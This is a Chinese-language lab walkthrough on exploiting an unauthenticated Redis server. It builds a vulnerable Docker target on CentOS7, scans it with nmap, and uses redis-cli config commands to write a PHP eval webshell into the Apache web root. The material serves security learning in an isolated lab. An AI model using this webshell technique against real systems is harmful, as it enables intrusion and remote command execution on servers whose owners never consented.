1.本地环境搭建

靶机:centos7 ip:192.168.221.129   

攻击机:kali ip:192.168.221.128

centos7(需安装php)打开apache服务

yum install httpd
//安装apache
systemctl stop firewalld.service
//关闭防火墙
systemctl start httpd 
//启动apache

在centos7上使用docker拉取环境(centos7需打开apache服务)

docker pull medicean/vulapps:r_redis_1
docker run -dit -p 6379:6379 -p 2222:22 medicean/vulapps:r_redis_1

2.攻击过程

1.使用nmap扫描centos7

nmap -sV -p- -T4 192.168.221.129 

2.使用redis-cli连接redis服务器

redis-cli -h 192.168.221.129  -p 6379
//-h:指定连接的redis服务器
//-p 指定6379端口 

keys *   
//列出当前数据库的所有键
config set dir /var/www/html        
//设置备份文件的放置路径(这个路径是centos7开启的apache服务的根目录)
config set dbfilename shell.php    
//设置备份文件的文件名
set shell "<?php @eval($_POST['cmd']);?>"     
//shell表示添加一个键,这个键的值为一句话木马
save     
//保存

然后连接webshell即可

以上是写入webshell的方法,还有其他两种方法

Logo

汇聚全球AI编程工具,助力开发者即刻编程。

更多推荐